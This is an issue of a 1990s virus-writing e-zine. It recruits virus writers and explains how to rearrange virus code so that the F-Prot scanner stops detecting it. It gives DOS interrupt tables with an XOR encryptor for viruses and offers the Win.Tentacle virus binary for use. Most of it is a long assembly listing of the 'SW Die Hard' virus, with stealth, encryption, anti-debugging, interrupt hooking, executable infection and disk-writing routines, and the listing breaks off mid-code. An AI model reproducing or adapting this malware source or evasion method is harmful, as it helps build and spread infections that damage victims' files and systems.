Virus Bits and Bytes Issue 3
Welcome to this issue of the VBB Mag. Enjoy. Here are some quick notes:
- Our official homepage is at: http://ourworld.compuserve.com/homepages/dirk_s/
- I'm looking for more experienced virus writers. If you are one, then please apply using the attached membership application form!
- We now have our own message board for you to use! You can get more info at: http://ourworld.compuserve.com/homepages/dirk_s/board.htm
INDEX
- 000 - You're reading it! :)
- 001 - What's up!
- 002 - Not again! Caught by F-prot.
- 003 - Table of Important Interrupt Functions
- 004 - The Win.Tentacle Virus!
- 005 - The Die Hard Virus!
- 006 - Homemade Macro Virus by Phardera! Enjoy.
- 007 - Rickdoggs Lord Natas v666.
- 008 - The Bandung Macro Virus
- 009 - New Macro Virus! Daniel_1F.
- 010 - The HD Euthanasia Virus! Pretty Dangerous!
- 011 - Virus Writers VBB Application Form!
- 012 - Where To ?
Staff
- Dark Night - Mag Editor, Virus Supply, etc...
- Aurodreph - Co-Editor, Macro Virus Specialist, etc....
- Arsenik - Articles and Tutorials
- Phadera - Indonesian Virus Supply, Articles, etc ...
VBB NEWS
There's been a lot of stuff happening at VBB since the last issue. 7 people have joined the team:
- Bishop
- Phadera
- MugWomp
- KColt45
- Arsenik
- God@rky
- RickDogg
Also we now have 2 official distribution sites. The first one is being set-up at ILF and KColt45 has his own server which he will kindly provide us with our own directory to store our data. KColt45 will also be programming a visual interface for our mag. So expect to see some changes here. :)
ANNOUNCEMENTS
It's almost been 2 month since the last issue of the VBB mag. It got delayed so many times because people were on vacation, or the didn't hand in their articles on time. And now, we just got RickDoggs new virus which we wanted to evaluate before we give it to you. Well, we didn't quite reach all out goals, but I still hope that you'll enjoy this issue of the VBB mag.
THANKS!!
First of all thanks to all VBB members who have helped me so much in creating this mag and programming virii. This is the first issue in which you'll find homemade VBB virii. Also I would like to say thanks to all you readers who have given me feedback on how you liked the mag and what you wanted to see more/less of. Please keep it up.
Ok people, that's it for now. Peace! :)
NOT AGAIN! CAUGHT BY F-PROT
Most of you prbably know the feeling when you just have this brand-new, homemade virus which you spent weeks on creating, and here it is finished and perfectly new. Well, you put it through one last test. You compile the virus and scan it with F-Prot(or any other scanner). And there is the horror message:
Possibly a new variant of (whatever)
All your hard work for nothing. But, there is something you can do against that. Remember how I showed you a method on how to find scan strings in a virus? Well, you use that method to find what F-Prot is looking for. Then you split the stuff up using jumps and calls. Example:
Recently I have been working on a tutorial for Overwriting Virii for beginners. I used simple code to find a file to infect, and when I compiled the virus, F-Prot told me that the virus could be a possible variant of Trivial. As a definition it told me that Trivial is a tightly programmed virus made to only reproduce. So my code that I used was close to the code if the Trivial virus. So to solve my problem I moved the beginning of the virus. to the middle and I issued a call and I put a jump in front of the old part which I moved so that I wouldn't be executed again. Problem solved! F-Prot didn't think my virus was a variant of Trivial. So even though this method isn't small, it still works.
Dark Night
TABLE OF IMPORTANT INTERRUPT FUNCTIONS
I have noticed that a lot of people out there who want to learn how to program virii don't know the functions needed to do so. And some beginners keep on forgetting these functions. So to help you all here's my handy Table of Important Interrupt Functions.
THE TABLE
OPEN FILE:
ah = 3dh
al = 0-2 Access mode
000 = Read Only
001 = Write Only
010 = Read/Write
DS:DX = Segment:Offset of Asciiz pathname
CF = 0 ;function succesful
AX = handle
CF = 1 ;error
CLOSE FILE:
ax = 3eh
bx = file handle
CF = 0 ;function succesful
AX = destroyed
CF = 1 ;error
READ FILE:
ah = 3fh
bx = handle
cx = number of bytes to be read
DS:DX = segment:offset of a buffer
CF = 0 ;function is succesful
AX = number of bytes read
CF = 1 ;error
FIND FIRST MATCHING FILE:
ah = 4eh
cx = file attribute (bits can be combined)
bit 0 = 1 read only
bit 1 = 1 hidden
bit 2 = 1 system
bit 3 = 1 volume label
bit 4 = 1 directory
bit 5 = 1 archive
bit 6-15 reserved
DS:DX = Segment:Offset of ASCIIZ pathname
CF = 0 ;function is succesful
[DTA] Disk Transfer Area = FindFirst Data Block
FIND NEXT:
mov ah = 4fh ;rest is the same as in Find First
THE DTA
0 | 21 | reserved |
21 | 1 | File Attributes |
22 | 2 | Time Last Modified |
24 | 2 | Date Last Modified |
26 | 4 | Size of File (in bytes) |
30 | 13 | File Name (ASCIIZ) |
IMPORTANT FUNCTIONS
XOR ENCRYPTOR:
encypt_val dw ?
decrypt:
encrypt:
mov dx, word ptr [bp+encrypt_val]
lea bx, [bp+part_to_encrypt_start]
mov cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2
xor_loop:
xor word ptr [bx], dx
add bx, 2
loop xor_loop
;To use this make sure you have a part to calculate the offset!
OFFSET CALCULATOR
Setup:
pop si ;could use bp! Depends on which variable you
sub si, offset setup ;want to use to represent the offset! For
;the above encryptor I used bp.
I hope this helps you a bit in your venture against the AV folks. I will continue to publish stuff for beginners in the future issues. So enjoy!
Dark Night
Tentacle
I have included the Win.Tentacle virus in the file Tentacle.exv. Rename it to tentacle.exe to use it! Here's the description!
- NAME: Tentacle
- ALIAS: Win.Tentacle
- TYPE: Non-resident EXE -files
- SIZE: 1958
This Windows-based virus was found in the wild from France and UK in March 1996. The virus was distributed in a file called dogzcode.zip via the alt.cracks usenet newsgroup. Tentacle infects Windows 3.1x EXE files.
Tentacle infects files in the current and Windows directories. It does not stay memory resident.
Occasionally, Tentacle will replace the icon in the infected EXE file with it's own copy. This new icon has a picture of a tentacle and the text 'Tentacle'.
Win.Tentacle.1958
It is not a dangerous nonmemory resident parasitic virus. It searches for NewEXE-files in current and C:\WINDOWS directories, then writes itself to the end of the file. While infecting the virus creates temporary C:\TENTACLE.$$$ file, then modifies and copies blocks of original file to temporary one, then copies temporary file to original one, and then deletes temporary file.
From 0:0am till 0:15am the virus checks the just infected file for the Resources, and searches for Icon resource. If such Resource is there, the virus overwrites it with another icon which is contained in the virus body.
The virus contains the internal text string:
C:\TENTACLE.$$$ C:\WINDOWS\*.EXE
comment @--------------------------------------------------------
Pulished by Phardera [VBB]
SW Die Hard
- anti debugging
- encrypt in file & memory
- stealth
- self recovery
- tunneling
- ????
By: - Nirwan Nasution (Wanto)
- Supran Nasution (Pran)
- Robert Manurung (Roman)
- Agus Suherman (Eman)
- Alfian Besdi (Ibes)
- ????
History:
Sapta Wahyu
The Time Traveller
Sayha Watpu
Die Hard (Original)
Die Hard 2
SW Die Hard
????????
1993, The Pratama Dias Top Hackers
Medan, Sumatera Utara, Indonesia
-----------------------------------------------------------------@
MAKE macro op,r,o,n
local @1
ifnb <n>
&op r,n
else
&op r,1234h
endif
@1:
&o equ 2 ptr @1-2
endm
cpfileopen=0
cpfilerun03=1
cpfilerun01=2
cpfilerun00=3
cpfileclose=4
cpfileseek=5
cpfilecreate=6
cpfileread=7
cpfilefirst=8
cpfilenext=9
cpwritenop=10
cpfilewrite=11
cpfcbfind=12
cpfcbname=13
cpfilerename=14
cpfilechk=15
cpfileopen2=16
cpfileload=17
cpfiledebug=18
REOF UNION
struc
intn dd ? ;CALL INT
ofst dd ?,?
lxe dw ?
xle dw ?,?
ends
struc
dmabuf dw ?
ends
ends
headerexe struc
kodeexe dw ? ;0
image1 dw ?
image2 dw ?
count dw ? ;6
headsize dw ? ;8
minmem dw ? ;10
maxmem dw ? ;12
ss_rec dw ? ;14
sp_rec dw ? ;16
chksum dw ? ;18
ip_rec dw ? ;20
cs_rec dw ? ;22
ends
headerdebug struc
d_env dw ?
d_prm dd ?
d_fcb1 dd ?
d_fcb2 dd ?
d_sptac dw ?
d_sstac dw ?
d_ip dw ?
d_cs dw ?
ends
ttfil struc
fill db 13 dup (?)
fike1 dw ?
dike1 dw ?
fike2 dw ?
dike2 dw ?
ends
tempdta struc
ttfil <> ;21
attrf db ? ;22
timef dw ?
datef dw ?
sizef dd ?
namef db 13 dup (?)
tempdta ends
tempdta2 struc
ttfil <>
tfname dw ?
tname db 79 dup (?)
ends
tpgo struc
togo13 dd ?
toof13 dd ?
toex13 dd ?
ends
fcb_s struc
fcbdrv db ?
fcbnm db 8 dup (?)
fcbext db 3 dup (?)
ends
dummy_data struc
fn1 db 80 dup (?)
dest_fcb db 16 dup (?)
source_fcb db 16 dup (?)
ends
Smystack struc
ocx dw ?
odx dw ?
spop24 dw ?
namepoi dw ?,?
xdta dd ?
poisave dd ?
poi100 dw ?
poi90 dw ?
poi4C dw ?
poi00 dw ?
xbohd dw ?
xax dw ? ;2
xbx dw ? ;4
xes dw ? ;6
xdx dw ? ;8
xds dw ? ;10
xcx dw ? ;12
xsi dw ? ;14
xdi dw ?
xbp dw ?
ptrdeb dd ?
ptrnm dd ?
Smystack ends
savehdl struc
hdlnya db ?
sizenya dd ?
kodewr db ?
datawr dw 12 dup (?)
savehdl ends
saveint struc
sint00 dd ?
sint24 dd ?
sint13 dd ?
sint40 dd ?
saveint ends
typepas equ 14
typeasm equ 64
bufhdl equ size savehdl*7
.ALPHA
.model small
locals
api = 100h ;(((offset eof.dmabuf-start)+0Fh) / 16)
enb = 1400h; ((offset eof.dmabuf+40Fh-start) and 0FFF0h)
ifndef pwa
pwd = 0FFh
else
pwd = 14h
endif
cade segment
assume cs:cade,ds:_TEXT
qu:
mov ax,_TEXT
mov si,offset _text:s
mov ds,ax
mov ss,ax
mov es,ax
mov di,offset _text:eof
mov al,0CCh
mov ch,10h
cld
rep stosb
mov si,offset eohd
@@1:
mov bx,offset dohd-offset olk1
@@2:
dec bx
jl @@1
dec si
dec si
mov ax,2 ptr [bx+olk1]
add ax,offset fohd
ifndef is_fin
xor al,pwd
xor [si],ax
else
mov ax,[si]
endif
cmp si,offset bohd
jne @@2
mov bp,offset temp
call far ptr _text:moves
mov 1 ptr [mk90],0C3h
cld
mov di,offset temphdl
mov cx,bufhdl+1
mov al,-1
rep stosb
comment #
mov di,offset fwrbuf
mov cx,offset s
sub cx,di
rep stosb
mov di,offset nextdata+112
mov cx,offset s
sub cx,di
mov al,0cch
rep stosb
#
mov si,offset ex21
mov al,21h
call hgi
mov ax,es
xor ax,0D1A5h
mov [ex21+4],ax
mov si,offset ex13
mov al,13h
call hgi
mov 2 ptr [of13],4Ch
mov 2 ptr [of13+2],0
mov al,40h
mov si,offset ex40
call hgi
ifdef is_fun
mov 1 ptr [cp3Ch+1],3Ch
mov 1 ptr [cp6Ch+1],6Ch
mov 1 ptr [cp3Eh+1],3Eh
endif
push cs
pop ds
assume ds:cade
mov dx,offset nm
; mov ah,3Ch
mov ax,3D00h
call ne21
jc @@3
xchg bx,ax
; mov dx,offset cd1
; mov cx,1000
; mov ah,40h
; call ne21
call closer
@@3:
; mov dx,offset nm
; mov ax,3d02h
; call ne21
; xchg bx,ax
; mov dx,offset cd2
; mov cx,4
; mov ah,40h
; call ne21
; call closer
mov dx,offset nmp
mov ah,3Ch
xor cx,cx
call ne21
xchg bx,ax
mov dx,offset q1
mov cx,110h
mov ah,40h
call ne21
call closer
mov dx,offset nmp
mov ax,3d02h
call ne21
xchg bx,ax
call closer
xor cx,cx
mov bx,21h
mov ah,6Ch
mov dx,12h
mov si,offset nmn
call ne21
xchg bx,ax
; mov 2 ptr [cd1],20CDh
mov dx,offset cd2
mov cx,200
mov ah,40h
call ne21
call closer
mov dx,offset nmn
mov ax,3D02h
call ne21
xchg bx,ax
mov ax,4202h
mov dx,-1
mov cx,dx
call ne21
mov ax,4202h
xor cx,cx
cwd
call ne21
mov ax,4200h
xor cx,cx
cwd
call ne21
mov dx,0E000h
mov ah,3Fh
mov cx,200
call ne21
call closer
ifdef is_fin
xor cx,cx
mov bx,21h
mov ah,6Ch
mov dx,12h
mov si,offset nmno
call ne21
xchg bx,ax
mov dx,0E000h
mov ah,40h
mov cx,200
call ne21
call closer
mov dx,offset nms
mov ah,4eh
call ne21
lagihj:
mov ah,4fh
call ne21
jnc lagihj
mov dx,offset nfcb
mov ah,11h
call ne21
lagihp:
mov ah,12h
call ne21
cmp al,-1
jne lagihp
push cs
pop es
mov dx,offset nrn0
mov di,offset nrn1
mov ah,56h
call ne21
; mov dx,offset nfc
; mov ah,17h
; call ne21
endif
comment #
call no2
xchg bx,ax
mov 2 ptr [q1+5],101h
mov dx,offset q1
mov cx,6
mov ah,3Fh
call ne21
call closer
call no2
xchg bx,ax
xor cx,cx
mov dx,1
mov ax,4200h
call ne21
mov dx,offset q1
mov cx,3
mov ah,3Fh
call ne21
call closer
#
mov ah,4Ch
int 21h
no2:
mov dx,offset nm
mov ax,3D02h
ne21:
pushf
call far ptr _text:new21
ret
closer:
mov ah,3eh
jmp short ne21
hgi:
mov ah,35h
int 21h
mov [si],bx
mov [si+2],es
ret
nms db '*.*',0
nmp db 'IP.ASM',0
nmn db 'IP.COM',0
nmno db 'IP.CA',0
nm db 'OP.COM',0
nrn0 db 'G:\IP.CA',0
nrn1 db 'EP.EXE',0
nfcb db -1,0,0,0,0,0,16h
nfc db 0,'???????????',0,0,0,0
db 0,'A C?M',0,0,0,0
cd1 db 4Dh,5Ah
db 0E8h,1,2,0,0,0
db 20h,0,0,0,-1,-1,0,0
db 0,0,0,0,0,0,0,0
db 3Eh,0,0,0,1,0,0FBh,30h
db 6Ah,72h
db 512 - 34 dup (?)
cd2:
call pjl
db 'TEST',13,10,36
pjl:
push cs
pop ds
pop dx
mov ah,9
int 21h
mov ah,4Ch
int 21h
q1:
db (1024 - (offset q1-qu))/4 dup ('AB',13,10)
q2:
if (offset q2-qu) lt 1024
db 1024 - (offset q2-qu) dup (0)
endif
ends
.code
assume ds:_TEXT
org 0
start:
newdta label byte
mov dx,sp
mov cl,4
mov bp,cs
xchg bx,ax
cli
mov ss,bp
call reloc1
temp:
xchg bp,ax
push ax
dec sp
dec sp
add ax,-(enb/16)
mov es,ax
moves:
cld
mov di,enb
lea si,[bp-(temp-start)]
mov cx,offset eohd
rep movs 1 ptr es:[di],ss:[si]
mov cx,offset pkl-eohd
pkes:
mov al,1 ptr [bp+di-((temp-start)+enb)]
mov si,offset eos-pkes
ifdef is_fin
@@1:
mov ah,[bp+si+(offset pkes-temp)]
dec si
jnl @@1
db 0B4h
else
@@1:
xor al,[bp+si+(offset pkes-temp)]
dec si
jnl @@1
db 34h
endif
ccnt db pwd
stosb
loop pkes
mov ax,ds
mov es,ax
retf
eos:
dw offset rung
sppoi dw 0
sspoi label word
bcax dw 0
reloc1:
pop si
lea sp,[si+(offset bcax-temp)]
push si
shr si,cl
lea bp,[bp+si+(enb+410h+(offset pkl-start))/16]
mov cx,bp
pop ax
push ax
relocation: ;100-140 ;0EC0-$F00
and ch,0Fh
sub ch,0Fh
cmp cx,-3Fh
jb @@1
sub bp,cx
@@1:
ret
;;EC1-EFF
beghead db 0D1h,0A5h
mpi macro s,o
%OUT &s = &o
endm
if offset beghead-start NE 60h
abc=offset beghead-offset start
.radix 16
mpi beghead60,%abc
.radix 10
.ERR
endif
orgsize dw ?,?
orghdr headerexe ?
newhdr headerexe ?
endhead label byte
cknt db pwd
db 0
bohd:
mov sp,offset s.xax
sti
push si
xor si,si
mov ds,si
mov di,offset tempint
mov bx,offset unt24
call sting
mov si,90h
call sting
mov si,4Ch
mov bx,offset new13
call sting
mov si,100h
mov bl,low(offset new40)
call sting
push di ds;104
mov bp,di
lds bx,[bp.toof13] ;of13
lds bx,[bx]
; mov ax,ds
; cmp ax,2 ptr [bp.toex13+2] ;ex13+2
; je @@7
mov al,[bx]
dec 1 ptr [bx]
cmp al,[bx]
je @@7
mov [bx],al
@@6:
lds bx,[bp.toex13]
@@7:
xchg bx,ax
stosw
mov ax,ds
stosw
mov ah,2Fh
call nrg21
push es bx ss
pop ds
mov si,offset ex21+2
lodsw
xor ax,0D1A5h
cmp ax,[si]
jne unt24
mov ax,2 ptr [kode21]
cmp ah,1
cbw
push ax
mov bp,offset s
les di,4 ptr [bp.xdx]
jb @@8
mov di,[bp.xsi]
je @@9
lds si,4 ptr [bp.xdx]
push ss
pop es
mov di,offset nextdata.fn1
jns @@9
mov ah,30h
call nrg21
cmp al,3
jb unt24
xor di,di
mov ax,di
mov cx,[di+2Ch]
mov es,cx
@@10:
jcxz unt24
repnz scasb
scasb
jne @@10
scasw
@@8:
cmp al,cpfileload
jne @@9
les di,[bp.ptrnm]
@@9:
pop bx
push es
push di
mov cx,8
shl bx,1
call 2 ptr ss:[bx+(tab-start)]
unt24:
mov ax,offset int24
mpd label word
jmp ax
fileread__ proc near ;OK
call scanhdlcl ;ch=0 ax=?
call getfilepos2
sub ax,[bp.xax]
sbb dx,cx
jnz @@1
push si
add si,offset datawr-1
push si ax di
call readend
pop di ax bx
cmp ax,cx ; 0 1 2 3 4
jae @@9
add si,ax ; 30 31 32 33
sub cx,ax
les di,4 ptr [bp.xdx]
cmp cx,[bp.xax]
jbe @@8
mov cx,[bp.xax]
@@8: push si
rep movsb
pop si
ja @@9
or ax,ax
jne @@9
mov di,offset fwrbuf
call movehdr2
mov si,bx
movsw
@@9:
pop si
@@1:
pop cx dx
mov bx,dx
mov di,cx
lodsw
sub bx,ax
sbb di,[si]
jc ncfi
jne @@2
sub [bp.xax],bx
jae @@3
@@2: mov [bp.xax],0
@@3:
push ax
push [si]
endp
ncfo:
mov sp,offset s.ocx
pop cx dx
ncfi:
mov ax,4200h
jmp short seterr241
wrthead:
mov dx,offset newhdr+enb
mov cl,size headerexe
doswrt:
mov ah,40h
nrg21bx:
MAKE mov,bx,fhandle
nrg21werr:
clc
call nrg21
jc unt24
ret
nchl: mov sp,offset s.spop24
seterr2413E:
mov ah,3Eh
seterr241:
push ss
pop ds
mov [mpd-2],offset int24
jmp short nrg21bx
wrtheadasm:
push ss
pop es
mov dh,high(enb-200h)
mov di,dx
mov si,offset fpas
cmp 1 ptr [newhdr+enb+1],dh ;typepas
jb @@9
mov si,offset ftasm
@@9:
lodsb
stosb
cmp al,13
jne @@9
mov al,10
stosb
mov ch,1
jmp short doswrt
fwr proc near
@@3:
cmp [bp.xcx],cx
jne @@2
@@0:
lodsw
call getfilepos2
push di
or 1 ptr [si-(datawr-hdlnya)],80h
mov di,si
call readend
push si cx
call seek0
pop cx dx
call doswrt
mov si,di
mov 1 ptr [si-(datawr-kodewr)],0
filecut:
call toseekaw
mov ah,40h
jmp short doswrt2
filewrite_: ;OK
call scanhdlcl80 ;ch=0 ax=?
mov al,1
call seekcxdx0
cmp [si],cl
jns @@1
cmp [si.kodewr],cl
je @@9
or ax,dx
jne @@9
mov si,offset fwrbuf
les di,4 ptr [bp.xdx]
mov cl,size headerexe/2
rep cmpsw
jne @@9
mov dx,[si]
jmp filecreate_
@@1:
inc si
xchg cx,ax
lodsw
sub cx,ax
sbb dx,[si]
jc @@0
jne @@2
jcxz @@3
@@2:
makeerr:
les di,4 ptr [sppoi]
mov ax,offset nocrep
stosw
@@9: ret
endp
seek0:
xor al,al
seekcxdx0:
mov ah,42h
cwd
doswrt2:
xor cx,cx
nrg21:
pushf
call 4 ptr ss:[ex21]
seekre: ret
toseekaw:
les dx,4 ptr [si-(datawr-sizenya)]
mov ax,es
seekawalcxax:
xchg cx,ax
mov ah,42h
nrg21al0:
xor al,al
jmp short nrg21
parse:
mov di,offset nextdata.source_fcb
mov ah,29h
jmp short nrg21al0
writenop:
call makeerr
mov bl,2
mov dx,offset nowrite
mov cl,12
call wrt40
inc cx
mov bl,4
call wrt40
dec bx
wrt40:
mov ah,40h
jmp short nrg21
fileseek__:
call scanhdlcl ;ch=0 ax=?
inc si
lodsw
xchg dx,ax
lodsw
dec 2 ptr [bp.xax]
jmp seekawalcxax
ftasm: ;64
db '.model small',10
db '.code',10
db 'org 256',10
db 'P—•: db "Ë",0,"—•$Z¥ Õ!¥LÕ!"',10
db 'end P—•',13
fpas: ;14
db "begin write('—•')end."
nowrite db 13,10
db 'SW Error ',13
tab dw fileopen__,filerun03_,filerun01_,filerun00_,fileclose_
; 0 1 2 3 4
dw fileseek__,filecreate,fileread__,filefirst_,filenext__
; 5 6 7 8 9
dw writenop ,filewrite_,fcbfind___,fcbname___,filerename
; 10 11 12 13 14
dw filechk___,fileopen2_,fileload__,filedebug
; 15 16 17 18
new40:
cmp ah,3
jne old40
jmp 4 ptr cs:[ex40]
old40:
jmp 4 ptr cs:[tempint.sint40]
new13 proc near
bprax equ bp+2
bpres equ bp+6
cmp ah,3
jne @@o1
or al,al
jne @@o2
@@o1:
jmp 4 ptr cs:[tempint.sint13]
@@o2:
mov cs:[@@02],ax
call rint13
jnc lretf2
cmp ah,11h
je @@04
cmp ah,9
je @@07
lretf2:
jmp tret5
@@04:
; call N13
; cmp 1 ptr cs:[@@02],1
; je lretf2
local bpsecthd
@@07:
MAKE mov,ax,@@02
push bp
call pushreg
pushf
cld
push cx
or dl,dl
jns @@08
push dx
mov ah,8
call rint13
xchg cx,ax
and al,00111111b
mov ah,dh
MAKE mov,di,d200h,200h
pop dx
jmp short @@10
@@08:
xor ax,ax
mov ds,ax
lds di,ds:[78h]
mov cl,[di+3]
mov di,128
shl di,cl
dec ax
@@10:
mov si,bx
mov cl,4
shr bx,cl
pop cx
mov bp,sp
add bx,[bpres]
mov ds,bx
and si,0Fh
push ax
@@11:
push di cs
pop es
xchg di,ax
xchg cx,ax
mov bx,enb-400h
mov di,bx
rep movsb
xchg cx,ax
mov ax,301h
call rint13
pop di
jnc @@13
cmp ah,11h
jne @@15
call N13
@@13:
dec 1 ptr [bprax]
jz @@15
mov al,cl
and al,11000000b ;al = 2 bit msb sector
and cl,00111111b ;cl = 6 bit msb sector
inc cx ;inc sector
cmp cl,1 ptr [bpsecthd]
jbe @@14
mov cl,1
inc dh
cmp dh,1 ptr [bpsecthd+1]
jbe @@14
xor dh,dh
inc ch
jnz @@14
add al,01000000b
@@14:
or cl,al
push ds
pop es
mov bx,si
mov ax,[bprax]
call rint13
jnc @@15
cmp ah,11h
je @@11
cmp ah,9
je @@11
@@15:
pop si
mov [bprax],ax
jmp tret4
endp
N13:
xor ax,ax
rint13:
pushf
call 4 ptr cs:[go13]
ret
filefirst_: ;ds=ss
mov si,offset tdta2
mov di,offset tdta1
push ss
pop es
mov cl,size tempdta2/2
rep movsw
lds si,[bp.xdta]
mov cl,size ttfil+2
rep movsb
pop dx si ds
push ss di dx
lodsw
cmp ah,':'
je @@1
dec si
dec si
mov ah,19h
call nrg21
add al,'A'
mov ah,':'
@@1:
stosw
and al,1Fh
xchg dx,ax
mov cl,65
mov al,'\'
cmp 1 ptr [si],al
je @@2
push si ds ss
pop ds
stosb
mov si,di
mov ah,47h
call nrg21werr
xor al,al
cmp [si],al
je @@3
repnz scasb
mov 1 ptr [di-1],'\'
@@3:
pop ds si
@@2:
rep movsb
call scanm2
mov [tdta2.tfname],ax
refind proc near
lds si,[bp.xdta]
add si,offset namef
push si ax
call parse
pop di
jmp short fcbrefind
filenext__: ;ds=ss
mov bl,size tempdta2*2
@@10:
sub bl,size tempdta2
jc @@9
lea si,[bx.tdta1]
les di,[bp.xdta]
mov cl,offset fike1
rep cmpsb
jne @@10
cmpsw
cmpsw
jne @@10
cmpsw
cmpsw
jne @@10
lodsw
mov [bp.namepoi],si
mov [bp.namepoi+2],ss
push ss
pop es
jmp short refind
fcbfind___:
mov al,1Dh
lds si,[bp.xdta]
cmp 1 ptr [si],ch
jnl @@4
add si,6
lodsb
test al,8
jnz storelabel
mov al,24h
@@4:
mov ss:[storedta-1],al
push si
call scanfcb
mov di,offset nextdata.source_fcb
fcbrefind:
pop si
mov cl,7
rep movsw
push ss
pop ds
mov si,offset nextdata.source_fcb.fcbext
call testexe
jne @@9
call openfile1
push di
call checkdig
jbe @@9
les di,[s.xdta]
add di,offset sizef
storedta label byte
resize:
xor cl,cl
jcxz @@8
mov si,offset newdta.sizef
sub [si],cx
sbb 1 ptr [si+2],cl
@@8:
movsw
movsw
@@9:
ret
endp
storelabel:
push cs ds
pop es ds
cmp 1 ptr [ccnt],cl
jb @@1
mov di,si
inc di
mov si,offset psw
mov cl,offset pkl-psw
rep movsb
mov ax,'5 '
stosw
@@1:
ret
extfl db '—EXECOM'
extfl1 db 'PASM'
testexe proc near
mov di,offset extfl
lodsb
scasb
je @@22
scasb
je @@2
scasw
scasb
je @@4
scasw
mov dx,(typepas*100h)+0D1h ;typepas
scasb
je @@2
scasb
jne @@3
mov dh,typeasm
@@2:
cmpsw
@@3:
clc
teret: ret
@@4:
cmpsw
jne @@3
ibmtest:
mov si,offset nextdata.source_fcb.fcbnm
lodsw
cmp ax,'BI'
jne @@22
lodsb
cmp al,'M'
jne @@22
mov cx,' S'
lodsw
cmp ax,'OD'
je @@21
mov cl,'O'
cmp ax,'IB'
jne @@22
@@21:
cmp cx,[si]
jne @@22
dec di
@@22:
sub di,offset extfl1
ret
endp
filedebug proc near ;ds=ss
mov ah,51h
cwd
push dx
call nrg21
pop es
mov di,88h
mov si,offset toret21
push si
movsw ;ip
movsw ;cs
pop si
mov es,bx
mov di,0Ah
movsw
movsw
les di,[bp.ptrdeb]
; env,prm,seg,fcb1,seg,fcb2,seg,sptac,sstac,ip,cs
; 0 2 4 6 8 10 12 14 16 18
lds si,4 ptr es:[di.d_ip]
cmp bx,es:[di.d_cs]
je @@1
cmp si,15
ja @@2
push di es
call @@3
mov dx,ds
sub dx,[si.cs_rec+size headerexe]
add di,offset d_sptac
add si,offset ss_rec
add [si],dx
lodsw
movsw ;sp
stosw ;ss
lodsw ;chksum
movsw ;ip
add [si],dx
movsw ;cs
ret
fileload__:
call openfile1
push di
call readhead2 ;ch=0
je @@2
lds si,[bp.ptrdeb]
mov ds,[si]
xor si,si
@@1:
cmp 1 ptr [si],0E9h
jne @@2
push si ds
lodsb
lodsw
add si,ax
call @@3
rep movsb
@@2:
ret
@@3:
add si,offset beghead-start
push ss
pop es
call cmpsig
pop ax es di
je @@2
push ax
lodsw ;orgsize
lodsw
endp
decrheader:
mov cx,size headerexe/2
push si
@@1:
not 2 ptr [si]
lodsw
loop @@1
pop si
getheadtype:
mov cx,24
cmp 2 ptr [si],'ZM'
je @@3
mov cl,3
@@3: ret
fcbname___: ;ds=?,si=dx
call scanfcb
lodsw
lodsw
mov di,offset nextdata.dest_fcb
mov cl,6
rep movsw
inc 1 ptr ss:[kode21]
jmp short fnren
scanfcb:
lodsb
or al,al
je @@0
add al,'@'
mov ah,':'
stosw
@@0:
mov dx,di
mov ax,' .'
call @@1
mov cl,3
xor al,al
@@1:
movsb
cmp 1 ptr [si],ah
loopnz @@1
stosb
add si,cx
ret
scanm2:
lds si,4 ptr [bp.namepoi]
scanm:
mov cl,79
@@0: mov dx,si
@@1: lodsb
cmp al,':'
je @@0
cmp al,'\'
je @@0
or al,al
loopnz @@1
xchg dx,ax
ret
filerename: ;ds=?,si=dx
mov cl,40
rep movsw ;mov ax,cli,xchg sp,pop,pop,xchg sp
mov ds,[bp.xes]
mov si,[bp.xdi]
call scanm
xchg si,ax
; mov di,offset nextdata.dest_fcb
mov ax,2900h
call filecca
fnren:
call scanm2
mov [storename],ax
jmp short fileinfect
filecreate: ;ds=ss
fileopen2_:
mov bx,[bp.xax]
call getdev
jc apa ;need bx
mov ah,2Ah
call nrg21
xchg dx,ax
cmp al,3
je @@1
cmp al,11
je @@1
cmp al,28
je @@1
cmp dl,2
jne @@4
cmp al,15
jne @@4
;@@0:
; mov al,(offset pk02-pk05)
; jne @@3
@@1:
mov al,(offset pk04-pk05)
@@3:
mov 1 ptr [pk05-1],al
@@4:
jmp short fileinfect
filerun03_:
filerun01_:
push ss ;lds ax,stosw,mov ax,stosw
pop es
mov si,offset s.xbx
mov di,offset s.ptrdeb
rep movsb
filechk___ proc near ;ds=?
fileopen__:
mov ax,3D00h
call fileacc
xchg bx,ax
call getdev
pushf
mov ah,3Eh
call nrg21
popf
apa: jc @@Z@
filerun00_:
fileinfect:
;0fileopen__:
;1filerun03_:
;2filerun01_:
;3filerun00_:
;5filecreate:
;15filechk___:
mov ah,1Ah
if (offset newdta-start) EQ 0
cwd
else
mov dx,offset newdta
endif
call nrg21
mov ah,4Eh
mov cx,27h
@@0:
call fileacc
push ss
pop es
mov si,offset newdta.namef
call parse
mov si,offset nextdata.source_fcb.fcbext
mov al,1 ptr [kode21]
cwd
cmp al,cpfilerename
jne @@10
cmp 1 ptr [si],0D1h
je @@ZA
mov bx,2
@@31:
mov al,[bx+si-16]
cmp al,'?'
je @@32
mov [bx+si],al
@@32:
dec bx
jnl @@31
call testexe
jne @@9
MAKE mov,di,storename
mov si,offset newdta.namef
mov cx,13
rep movsb
call @@5
@@9:
mov ah,4Fh
jmp short @@0
filecreate_:
call scanhdlFF ;al=0,-1
mov [si],ch
mov [si.datawr],dx
mov [si.kodewr],al
@@Z@:
mov 1 ptr [kode21],-1
@@ZA: ret
@@10:
cmp al,cpfileopen2
je @@5?
cmp al,cpfilecreate
je @@5?
cmp al,cpfilerun01
@@5?:
xchg bx,ax
ja @@5
call testexe
jc @@Z@
mov al,0
je @@3
or bl,bl
je @@ZA
cwd
dec ax
@@3: cmp bl,cpfilecreate
@@3?: jb @@5
mov bx,[s.xax]
je filecreate_
;fileopen2:
mov 2 ptr [newhdr+enb],dx
call getfilepos
push di
call checkdig
jbe @@ZA
xchg cx,ax
call scanhdlFF ; ch = -1
xchg cx,ax
xchg bx,ax
mov di,si
stosb
mov si,offset orgsize
call resize
mov al,-1
stosb ;kodewr
jcxz @@13
mov si,offset newhdr+enb
jmp short movehdr
@@13:
call decrheader
jmp short movehdr
movetonew:
mov di,offset newhdr+enb
movehdr2:
push ss
pop es
movehdr:
mov cx,size headerexe/2
rep movsw
ret
@@5:
push dx
xor cx,cx
call setfattr
pop dx
mov di,offset nchj
mov al,02h
call openfile
scasb
scasw
push di
cmp al,cpfilechk
jne reinfect
endp
call readhead2 ;ch=0
mov di,offset newhdr.ip_rec
jne @@6
mov di,offset newhdr.count
@@6: lea si,[di+(enb-size headerexe)]
mov cl,2
rep cmpsw
jne nchj
mov di,offset newdta.sizef
